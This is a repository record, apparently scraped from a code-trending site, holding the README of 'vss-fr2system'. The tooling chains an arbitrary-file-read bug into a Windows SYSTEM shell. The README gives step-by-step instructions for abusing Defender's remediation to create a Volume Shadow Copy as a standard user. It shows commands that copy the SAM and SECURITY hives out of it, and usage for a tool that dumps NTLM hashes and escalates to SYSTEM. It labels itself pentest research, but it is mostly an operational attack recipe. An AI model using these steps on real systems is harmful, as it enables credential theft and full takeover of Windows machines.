[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-3563":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":15,"stars7d":15,"stars30d":16,"stars90d":14,"forks30d":14,"starsTrendScore":17,"compositeScore":18,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":21,"hasPages":19,"topics":22,"createdAt":9,"pushedAt":9,"updatedAt":23,"readmeContent":24,"aiSummary":25,"trendingCount":14,"starSnapshotCount":14,"syncStatus":26,"lastSyncTime":27,"discoverSource":28},3563,"vss-fr2system","sailay1996\u002Fvss-fr2system","sailay1996","test",null,"C",108,19,95,0,1,10,3,44.4,false,"main",true,[],"2026-06-12 04:00:18","# vss-fr2system\n\nTwo small tools that turn an **arbitrary file read** bug on Windows into a **SYSTEM shell**.\n\n- `vss_freeze\u002F` — creates a Volume Shadow Copy as a **standard user**, then holds it open so you have time to read the SAM\u002FSECURITY\u002FSYSTEM hives out of it\n- `fr2system\u002F` — takes the hives you copied out, decrypts the local NTLM hashes offline, and pops a SYSTEM shell\n\nTogether with any arb-file-read primitive that runs as SYSTEM (or anything that can read out of `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyN\\...`), this is a complete std-user → SYSTEM chain on a default Win10\u002FWin11 box.\n\n---\n\n## Background\n\nThis was extracted out of [**BlueHammer**](https:\u002F\u002Fgithub.com\u002FNightmare-Eclipse\u002FBlueHammer) — the Win Defender abuse research where we found that dropping an EICAR file under a watched path makes Defender create a Volume Shadow Copy as part of its remediation flow. 
We held a `RstrtMgr.dll` batch oplock on Defender's load path so Defender stays parked at the start of remediation, which in turn keeps the VSS alive for as long as we need.\n\nOriginally there was a Stage 2 cldflt freeze on top of that, but cldflt rejects non-OneDrive sync providers on Win11 24H2 (`CfRegisterSyncRoot` returns `0x80070057`). Just holding the Stage 1 oplock open turned out to be enough — Defender stays paused, VSS stays alive, no Cloud Files API at all.\n\n---\n\n## The chain\n\n### Real LPE (you already have an arb file read)\n\n```\n[ vss_simple_freeze.exe ]   →   [ your arb-read PoC ]   →   [ fr2system.exe ]\n   creates VSS as std user        reads SAM\u002FSECURITY        cracks NTLM, pops SYSTEM\n   holds it via oplock            out of the VSS path       shell\n```\n\n1. Run `vss_simple_freeze.exe --hold 120` as a normal user. It prints the VSS path, e.g. `\\Device\\HarddiskVolumeShadowCopy7`.\n2. Run your arb-file-read bug to read these out of the VSS:\n   - `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyN\\Windows\\System32\\Config\\SAM`\n   - `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyN\\Windows\\System32\\Config\\SECURITY`\n   - Drop them as `C:\\Windows\\Temp\\fileread\\SAM` and `C:\\Windows\\Temp\\fileread\\SECURITY`.\n3. Run `fr2system.exe`. 
SYSTEM shell.\n\n### Testing without an arb-read bug\n\nIf you just want to verify the chain works end-to-end on your box, fake the arb-read step with an admin `cmd`:\n\n```cmd\n:: Window 1 - std user\nvss_simple_freeze.exe --hold 300\n\n:: Window 2 - admin cmd (simulating the arb-read primitive)\nmkdir C:\\Windows\\Temp\\fileread\ncopy \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\Windows\\System32\\Config\\SAM\"      C:\\Windows\\Temp\\fileread\\SAM\ncopy \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\Windows\\System32\\Config\\SECURITY\" C:\\Windows\\Temp\\fileread\\SECURITY\n\n:: Window 3 - std user again\nfr2system.exe\n```\n\n(Replace `7` with whatever number `vss_simple_freeze` printed.)\n\n---\n\n## Usage\n\n### vss_simple_freeze\n\n```\nvss_simple_freeze.exe [options]\n\n  --hold N            Auto-release after N seconds (default: wait for Enter)\n  --auto              Non-interactive, hold up to 600s\n  --publish FILE      Write VSS path to FILE (default: %TEMP%\\vss_current.txt)\n  --no-publish        Don't write VSS path anywhere\n  --event NAME        Release when named event Local\\NAME is signaled\n  --quiet             Suppress per-second liveness output\n  --help              Show help\n\nExamples:\n  vss_simple_freeze.exe                              # interactive, Enter to release\n  vss_simple_freeze.exe --hold 120                   # auto-release after 2 min\n  vss_simple_freeze.exe --event lpe_done --hold 300  # release on signal or 5 min\n```\n\n### fr2system\n\n```\nfr2system.exe [options]\n\n  (none)                Default - read SAM\u002FSECURITY from C:\\Windows\\Temp\\fileread, escalate to SYSTEM\n  --dump                Dump NTLM hashes only, don't escalate\n  --scan                Scan for alternative credential sources\n  --path DIR            Use a different input directory\n  --help                Show help\n\nExamples:\n  fr2system.exe\n  fr2system.exe --dump\n  fr2system.exe --path 
C:\\lab\\hives\n```\n\n`fr2system.exe` expects at least `SAM` in the input dir. `SECURITY` is optional (used for LSA secrets \u002F DPAPI keys).\n\n---\n\n## Build\n\nBoth projects use MSVC (static CRT, x64).\n\n```cmd\ncd vss_freeze\nbuild_vss_simple_freeze.bat\n\ncd fr2system\nmsbuild fr2system.sln \u002Fp:Configuration=Release \u002Fp:Platform=x64\n```\n\n---\n\n## Screenshots\n\nVSS creation:\n\n![vss_simple_freeze run](docs\u002Fvss_freeze.png)\n\nfr2system → SYSTEM shell:\n\n![fr2system run](docs\u002Ffr2system.png)\n\n---\n\n## Notes\n\n- Tested on Win10 22H2 and Win11 23H2\u002F24H2 with Defender enabled.\n- The VSS technique relies on Defender's remediation flow. With Defender disabled or replaced by another AV, the Stage 1 oplock won't fire and no VSS will be created — pick a different VSS primitive in that case.\n- This is research \u002F authorized pentest tooling. Don't run it on systems you're not allowed to.\n","vss-fr2system is a toolset designed to turn an arbitrary file read vulnerability on Windows into a SYSTEM-privileged shell. The project consists of two main components: `vss_freeze` and `fr2system`. The former creates a Volume Shadow Copy as a standard user and holds it open, giving the attacker enough time to read the SAM\u002FSECURITY\u002FSYSTEM registry hives out of the copy; the latter decrypts the local NTLM hashes and ultimately obtains SYSTEM-level access. The project is aimed at security researchers or penetration testers who already have an arbitrary file read capability, and achieves standard-user to SYSTEM privilege escalation on Windows 10\u002F11 in its default configuration.",2,"2026-06-11 02:54:42","CREATED_QUERY"]